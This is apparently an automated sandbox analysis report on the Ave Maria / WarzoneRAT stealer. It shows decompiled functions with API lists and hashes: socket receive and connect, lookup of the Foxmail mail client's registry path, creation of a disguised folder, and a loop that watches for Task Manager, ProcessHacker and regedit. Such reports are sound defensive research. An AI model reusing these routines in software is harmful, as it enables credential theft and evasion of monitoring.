                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 00405806
                                  • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 00405876
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                  • String ID: `$warzoneTURBO
                                  • API String ID: 3973575906-3455775371
                                  • Opcode ID: a3680666d4698ede3643cffe89399fc26e680efdcabfa74173f1fee4127a171c
                                  • Instruction ID: 35ac9e55f98b3bce9837d823b4f88ae1208dbfd8d39d165d9c06c2cd8671669a
                                  • Opcode Fuzzy Hash: a3680666d4698ede3643cffe89399fc26e680efdcabfa74173f1fee4127a171c
                                  • Instruction Fuzzy Hash: 06516E71910118AACB15FF62CC86CEFBB3CEF48755B00417AF815B61D2EA385B45CAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E27, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00402E27(char __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				char _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx;
				E00410D2D(E00410E5E( &_v24, __edx),  &_v20);
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E004134A2( &_v344,  &_v16);
				_v12 = 0;
				E00413279(_t28, _v16, 0x10ad,  &_v12);
				_t82 = _t81 + 4;
				E004036F7(_t82, _v20);
				E004036F7(_t82, _v24);
				_t32 = E00410F3E();
				E004036F7(_t82, 0x417668);
				_t64 = _t82;
				E0041119D(_t82);
				_t35 = E00411177(_t82);
				_t36 = E0041111B();
				_t37 = E00410F61();
				E004111D7(_t82, _v16);
				E00405044(_t54, E0040430E( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
				E004042CC( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E00401052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E0040906F(_t54, 1);
					_v12 = 0x41a8b0;
					E00405044(_t54,  &_v12);
				}
				E00405FEB(_v20);
				return E00405FEB(_v24);
			}






















                                  0x00402e27
                                  0x00402e32
                                  0x00402e38
                                  0x00402e42
                                  0x00402e56
                                  0x00402e5f
                                  0x00402e68
                                  0x00402e7b
                                  0x00402e7e
                                  0x00402e86
                                  0x00402e8e
                                  0x00402e97
                                  0x00402e9c
                                  0x00402ead
                                  0x00402eb3
                                  0x00402eb5
                                  0x00402eba
                                  0x00402ec0
                                  0x00402ec6
                                  0x00402ed5
                                  0x00402ee5
                                  0x00402eed
                                  0x00402ef7
                                  0x00402f06
                                  0x00402f1a
                                  0x00402f2c
                                  0x00402f3a
                                  0x00402f43
                                  0x00402f4b
                                  0x00402f55
                                  0x00402f55
                                  0x00402f5d
                                  0x00402f6e

                                  APIs
                                    • Part of subcall function 00410D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                    • Part of subcall function 00410D2D: CoInitialize.OLE32(00000000), ref: 00410D4B
                                    • Part of subcall function 00410D2D: CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E56
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00410F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 00410F4F
                                    • Part of subcall function 0041119D: GetComputerNameW.KERNEL32 ref: 004111C0
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                    • Part of subcall function 0041111B: GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                    • Part of subcall function 0041111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                    • Part of subcall function 0041111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                    • Part of subcall function 0041111B: CloseHandle.KERNEL32(00000000), ref: 00411167
                                    • Part of subcall function 00410F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 00410F79
                                    • Part of subcall function 00410F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00410F89
                                    • Part of subcall function 004111D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402F1A
                                  • lstrcatW.KERNEL32 ref: 00402F2C
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402F3A
                                    • Part of subcall function 0040906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                    • Part of subcall function 0040906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                    • Part of subcall function 0040906F: EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                    • Part of subcall function 0040906F: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                    • Part of subcall function 0040906F: LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                  • String ID: \Microsoft Vision\
                                  • API String ID: 1987359387-1618823865
                                  • Opcode ID: f0dc2ad6ea702e7073f60f83b80db7d883d1c1c031e6252cb074b5a7b31379b8
                                  • Instruction ID: 851052fb16c6d29596c0b523666286a16417f9887d42e77abec1e0ca40aba6c7
                                  • Opcode Fuzzy Hash: f0dc2ad6ea702e7073f60f83b80db7d883d1c1c031e6252cb074b5a7b31379b8
                                  • Instruction Fuzzy Hash: 56318571A005197BCF14FBA2DC46DEEB77CAF44308F00046EB205B21D1DA7C5A858B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412049, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00412049(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E00411E6D();
				_push(__ecx);
				_t16 = E00411E88(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
					_t16 =  *_t16(E00412049,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						E00411CE3(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E004120F8( &_v16, _t47, E004036F7( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						E00405FEB(_v8);
						_v8 = 0;
						E00405FEB(0);
						_push(0);
						_v12 = 0;
						E004120F8( &_v16, _t47, E004036F7( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						E00405FEB(_v8);
						_v8 = 0;
						return E00405FEB(0);
					}
				}
				return _t16;
			}












                                  0x00412049
                                  0x00412050
                                  0x00412055
                                  0x0041205d
                                  0x00412065
                                  0x00412076
                                  0x00412078
                                  0x0041207b
                                  0x0041207d
                                  0x0041207f
                                  0x0041208f
                                  0x00412095
                                  0x00412099
                                  0x004120ae
                                  0x004120b6
                                  0x004120bd
                                  0x004120c0
                                  0x004120c5
                                  0x004120c9
                                  0x004120de
                                  0x004120e6
                                  0x004120ed
                                  0x00000000
                                  0x004120f0
                                  0x0041207d
                                  0x004120f7

                                  APIs
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  • MessageBoxA.USER32 ref: 0041208F
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • Bla2, xrefs: 00412086, 0041208C, 0041208D
                                  • VirtualQuery, xrefs: 00412056
                                  • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 004120CD
                                  • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0041209D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                  • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                  • API String ID: 1196126833-2308542105
                                  • Opcode ID: 3acb6732effa49e07be3e8a40aa91923fc631926421db321b1f2545d5e959105
                                  • Instruction ID: b002b8fab82c5f8035800c071d4aecb67a577e28dec50426e7e7b6f2e11e6f57
                                  • Opcode Fuzzy Hash: 3acb6732effa49e07be3e8a40aa91923fc631926421db321b1f2545d5e959105
                                  • Instruction Fuzzy Hash: C2113D71A40119BACB08EBA5D956CEF7B7CAE08704B10416FB502B2181DF785F85D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C5E8, Relevance: 8.8, APIs: 7, Instructions: 35COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040C5E8(void* __ecx) {
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if(__ecx != 0) {
					if( *(__ecx + 0x30) != 0) {
						LocalFree( *(__ecx + 0x30));
					}
					if( *(_t25 + 0x40) != 0) {
						LocalFree( *(_t25 + 0x40));
					}
					if( *(_t25 + 0x48) != 0) {
						LocalFree( *(_t25 + 0x48));
					}
					if( *(_t25 + 0x58) != 0) {
						LocalFree( *(_t25 + 0x58));
					}
					if( *(_t25 + 0x60) != 0) {
						LocalFree( *(_t25 + 0x60));
					}
					if( *(_t25 + 0x68) != 0) {
						LocalFree( *(_t25 + 0x68));
					}
					return LocalFree(_t25);
				}
				return _t13;
			}





                                  0x0040c5e9
                                  0x0040c5ed
                                  0x0040c5fa
                                  0x0040c5ff
                                  0x0040c5ff
                                  0x0040c605
                                  0x0040c60a
                                  0x0040c60a
                                  0x0040c610
                                  0x0040c615
                                  0x0040c615
                                  0x0040c61b
                                  0x0040c620
                                  0x0040c620
                                  0x0040c626
                                  0x0040c62b
                                  0x0040c62b
                                  0x0040c631
                                  0x0040c636
                                  0x0040c636
                                  0x00000000
                                  0x0040c63b
                                  0x0040c63d

                                  APIs
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C5FF
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C60A
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C615
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C620
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C62B
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C636
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,0040C25A), ref: 0040C639
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocal
                                  • String ID:
                                  • API String ID: 2826327444-0
                                  • Opcode ID: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction ID: 62e6c422cf591d6120044b1c94743719a7044ae546b32db2f753074c0c434ab8
                                  • Opcode Fuzzy Hash: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction Fuzzy Hash: 6BF0EC30011B14DBD7326B26CC447A7B6A1BF80305F151E3AD08121AB0C77AA896DF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004094FF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004094FF(void* __ecx) {
				int _v8;
				void* _v12;
				void* _t7;

				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
					L3:
					_t7 = 0;
				} else {
					_v8 = 0x104;
					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x426868,  &_v8) != 0) {
						goto L3;
					} else {
						PathRemoveFileSpecA(0x426868);
						_t7 = 1;
					}
				}
				return _t7;
			}






                                  0x00409522
                                  0x00409556
                                  0x00409556
                                  0x00409524
                                  0x00409527
                                  0x00409549
                                  0x00000000
                                  0x0040954b
                                  0x0040954c
                                  0x00409552
                                  0x00409552
                                  0x00409549
                                  0x0040955a

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040951A
                                  • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,00426868,?), ref: 00409541
                                  • PathRemoveFileSpecA.SHLWAPI(00426868), ref: 0040954C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileOpenPathQueryRemoveSpecValue
                                  • String ID: Executable$software\Aerofox\FoxmailPreview
                                  • API String ID: 3687894118-2371247776
                                  • Opcode ID: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction ID: da810012986fcb6c8d8d394bbe01705385cba6e4fa72d30e5428379b1b1cd6da
                                  • Opcode Fuzzy Hash: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction Fuzzy Hash: 59F0A7B5784304BAEB509B46DC46FDB3BBC9755B04F200079BA05B11C2D2B49A45952C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041046E, Relevance: 7.7, APIs: 5, Instructions: 192COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0041046E(intOrPtr __ecx) {
				char _v5;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				signed int _v36;
				long _v40;
				char _v49;
				char _v52;
				intOrPtr _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v100;
				char _v2156;
				void* _t61;
				char _t64;
				intOrPtr _t70;
				signed int _t77;
				void* _t87;
				void* _t95;
				void* _t99;
				signed int _t100;
				signed int _t102;
				void* _t111;
				signed int _t115;
				void* _t119;
				intOrPtr _t123;
				void* _t133;
				void* _t134;
				void* _t137;

				 *0x559cac = __ecx;
				while(1) {
					_t61 = E0041075C( &_v100);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *0x426755 == 0) {
						break;
					}
					_t99 = 0xc;
					_v5 = 0;
					_t95 = E00406099(_t99);
					if(_t95 == 0) {
						_t95 = 0;
					} else {
						asm("stosd");
						asm("stosd");
						asm("stosd");
					}
					_t100 = _v32;
					_t3 = 0x426980 + _t100 * 0xc; // 0x426980
					_t119 = _t3;
					if( *_t119 != _t100) {
						_t64 = _v5;
					} else {
						_t64 = 1;
						_t95 = _t119;
					}
					if(_t64 != 0) {
						if( *((char*)(_t95 + 4)) != 1) {
							_t130 = _v24;
							__imp__#19( *(_t95 + 8), _v24, _v28, 0);
						} else {
							E00401052( &_v2156, 0, 0x802);
							_v20 = _v20 & 0;
							_v16 = _v16 & 0;
							_t102 = 8;
							memset( &_v84, 0, _t102 << 2);
							_t137 = _t137 + 0x18;
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_t123 = _v24;
							_t70 =  *((intOrPtr*)(_t123 + 3));
							if(_t70 != 1) {
								if(_t70 != 3) {
									if(_t70 == 4) {
										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802);
										_t77 = E0041085B(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
										goto L18;
									}
								} else {
									E00401052( &_v84, 0, 0x20);
									_v80 = 2;
									_v76 = 1;
									_v72 = 6;
									_t133 = E00401085(0x200);
									E0040102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
									_v36 = _v36 & 0x00000000;
									E0040102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
									_t137 = _t137 + 0x28;
									_t87 =  &_v84;
									__imp__getaddrinfo(_t133, 0, _t87,  &_v20);
									if(_t87 == 0) {
										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff;
										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4;
										goto L12;
									}
								}
							} else {
								_t134 = _t123 + 4;
								__imp__InetNtopW(2, _t134,  &_v2156, 0x802);
								_t115 =  *(_t123 + 8) & 0x0000ffff;
								_t111 = _t134;
								L12:
								_t77 = E004108DC(_t111, _t115);
								L18:
								_v16 = _t77;
							}
							_v52 = 5;
							_v49 = 1;
							E004106F9( &_v52, 0xa, _v32);
							 *(_t95 + 8) = _v16;
							 *((char*)(_t95 + 4)) = 2;
							_v40 = 0;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							CreateThread(0, 0, E0041068D, _t95, 0,  &_v40);
							_t130 = _v24;
						}
						E00401099(_t130);
					} else {
						_v12 = 5;
						E004106F9( &_v12, 2, _t100);
						 *((char*)(_t95 + 4)) = 1;
						 *_t95 = _v32;
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
				}
				return _t61;
			}




































                                  0x00410477
                                  0x00410669
                                  0x0041066d
                                  0x0041067f
                                  0x00410680
                                  0x00410681
                                  0x00410682
                                  0x00000000
                                  0x00000000
                                  0x00410487
                                  0x00410488
                                  0x00410491
                                  0x00410495
                                  0x004104a0
                                  0x00410497
                                  0x0041049b
                                  0x0041049c
                                  0x0041049d
                                  0x0041049d
                                  0x004104a2
                                  0x004104a8
                                  0x004104a8
                                  0x004104b0
                                  0x004104b8
                                  0x004104b2
                                  0x004104b2
                                  0x004104b4
                                  0x004104b4
                                  0x004104bd
                                  0x004104e8
                                  0x00410650
                                  0x0041065c
                                  0x004104ee
                                  0x004104fc
                                  0x00410509
                                  0x0041050c
                                  0x00410511
                                  0x00410512
                                  0x00410512
                                  0x00410517
                                  0x00410518
                                  0x00410519
                                  0x0041051b
                                  0x0041051e
                                  0x00410523
                                  0x0041054f
                                  0x004105d9
                                  0x004105ed
                                  0x004105f9
                                  0x00000000
                                  0x004105f9
                                  0x00410555
                                  0x0041055d
                                  0x00410567
                                  0x0041056e
                                  0x00410575
                                  0x00410585
                                  0x0041058d
                                  0x00410592
                                  0x004105a3
                                  0x004105a8
                                  0x004105af
                                  0x004105b6
                                  0x004105be
                                  0x004105c4
                                  0x004105cf
                                  0x00000000
                                  0x004105cf
                                  0x004105be
                                  0x00410525
                                  0x00410531
                                  0x00410537
                                  0x0041053d
                                  0x00410541
                                  0x00410543
                                  0x00410543
                                  0x004105fe
                                  0x004105fe
                                  0x004105fe
                                  0x0041060a
                                  0x00410610
                                  0x00410614
                                  0x00410623
                                  0x0041062e
                                  0x00410635
                                  0x0041063a
                                  0x00410642
                                  0x00410644
                                  0x00410645
                                  0x0041064b
                                  0x0041064b
                                  0x00410663
                                  0x004104bf
                                  0x004104c5
                                  0x004104cb
                                  0x004104d5
                                  0x004104d9
                                  0x004104dc
                                  0x004104dd
                                  0x004104de
                                  0x004104de
                                  0x00410668
                                  0x0041068c

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction ID: a997fb7a83d2290818e28b31fbf57bc7f8b037a2cfd84f52b4588474c50995db
                                  • Opcode Fuzzy Hash: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction Fuzzy Hash: 8961D871904218EEDB10CF95CC45BEFB7B9BF04304F00816AF945BB281D7B9A985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F086, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 90sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F086() {
				signed int _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t26;
				void* _t29;
				signed int _t32;
				signed int _t35;
				void* _t42;
				void* _t56;
				void* _t58;
				void* _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t64;

				_t64 = (_t62 & 0xfffffff8) - 0x1c;
				_t42 = 0;
				_v16 = _v16 & 0;
				_t56 = 0;
				_v8 = _v8 & 0;
				L1:
				_t26 = E00412155(E004036F7( &_v28, L"explorer.exe"));
				_t45 = _v32;
				_t58 = _t26;
				E00405FEB(_v32);
				_v32 = _v32 & 0x00000000;
				if(_t58 != 0 && _t58 != _t56) {
					_t56 = _t58;
					E00407B2E(_t45, _t45, _t58);
					_t64 = _t64 + 0xc;
				}
				_t29 = E00412155(E004036F7( &_v24, L"TASKmgr.exe"));
				_t48 = _v28;
				_t59 = _t29;
				E00405FEB(_v28);
				_v28 = _v28 & 0x00000000;
				if(_t59 != 0 && _t59 != _t42) {
					_t42 = _t59;
					E00407B2E(_t48, _t48, _t59);
					_t64 = _t64 + 0xc;
				}
				_t32 = E00412155(E004036F7( &_v20, L"ProcessHacker.exe"));
				_t51 = _v24;
				_t60 = _t32;
				E00405FEB(_v24);
				_v24 = _v24 & 0x00000000;
				if(_t60 != 0 && _t60 != _v16) {
					_v16 = _t60;
					E00407B2E(_t51, _t51, _t60);
					_t64 = _t64 + 0xc;
				}
				_t35 = E00412155(E004036F7( &_v12, L"regedit.exe"));
				_t54 = _v16;
				_t61 = _t35;
				E00405FEB(_v16);
				_v16 = _v16 & 0x00000000;
				if(_t61 != 0 && _t61 != _v8) {
					_v8 = _t61;
					E00407B2E(_t54, _t54, _t61);
					_t64 = _t64 + 0xc;
				}
				Sleep(0x3e8);
				goto L1;
			}






















                                  0x0040f08c
                                  0x0040f091
                                  0x0040f093
                                  0x0040f098
                                  0x0040f09a
                                  0x0040f09e
                                  0x0040f0ae
                                  0x0040f0b3
                                  0x0040f0b7
                                  0x0040f0b9
                                  0x0040f0be
                                  0x0040f0c5
                                  0x0040f0ce
                                  0x0040f0d0
                                  0x0040f0d5
                                  0x0040f0d5
                                  0x0040f0e8
                                  0x0040f0ed
                                  0x0040f0f1
                                  0x0040f0f3
                                  0x0040f0f8
                                  0x0040f0ff
                                  0x0040f108
                                  0x0040f10a
                                  0x0040f10f
                                  0x0040f10f
                                  0x0040f122
                                  0x0040f127
                                  0x0040f12b
                                  0x0040f12d
                                  0x0040f132
                                  0x0040f139
                                  0x0040f144
                                  0x0040f148
                                  0x0040f14d
                                  0x0040f14d
                                  0x0040f160
                                  0x0040f165
                                  0x0040f169
                                  0x0040f16b
                                  0x0040f170
                                  0x0040f177
                                  0x0040f182
                                  0x0040f186
                                  0x0040f18b
                                  0x0040f18b
                                  0x0040f193
                                  0x00000000

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00412155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                    • Part of subcall function 00412155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                    • Part of subcall function 00412155: CloseHandle.KERNEL32(00000000), ref: 004121C1
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • Sleep.KERNEL32(000003E8), ref: 0040F193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseCreateFirstFreeHandleProcess32SleepSnapshotToolhelp32Virtuallstrcpy
                                  • String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
                                  • API String ID: 1522922855-2180853415
                                  • Opcode ID: cde1bf2012f518953154dd03a6652405606b31095ca48fa773f12743569a33e4
                                  • Instruction ID: 1100a8f027d8646bfe9cbc7498619969e67dd2afa5e15d5111ff53f3380e378b
                                  • Opcode Fuzzy Hash: cde1bf2012f518953154dd03a6652405606b31095ca48fa773f12743569a33e4
                                  • Instruction Fuzzy Hash: 6321C471D053516BC724FF21C946AAFB6949F84759F040A3EF844733C2EA7CAE09C69A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004103B9, Relevance: 7.6, APIs: 5, Instructions: 70networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004103D3
                                  • gethostbyname.WS2_32(?), ref: 004103DC
                                  • htons.WS2_32(?), ref: 00410400
                                  • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00410431
                                  • connect.WS2_32(00000000,?,00000010), ref: 0041044A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InetNtopconnectgethostbynamehtonssocket
                                  • String ID:
                                  • API String ID: 2393792429-0
                                  • Opcode ID: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction ID: 727c1264bc9e30e98f597feacc0b668f5efde6c0f62ffec738b6da8cc58ee6c9
                                  • Opcode Fuzzy Hash: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction Fuzzy Hash: 851103B2900258BBE71097A4AC4AFEB7BBCEF05724F008476FD55D7191E6B4894487A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041221F, Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041221F(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				void* _t14;
				void* _t18;
				signed int* _t19;

				_t14 = __edx;
				_v560 = 0x22c;
				_t19 = __ecx;
				_t18 = CreateToolhelp32Snapshot(2, 0);
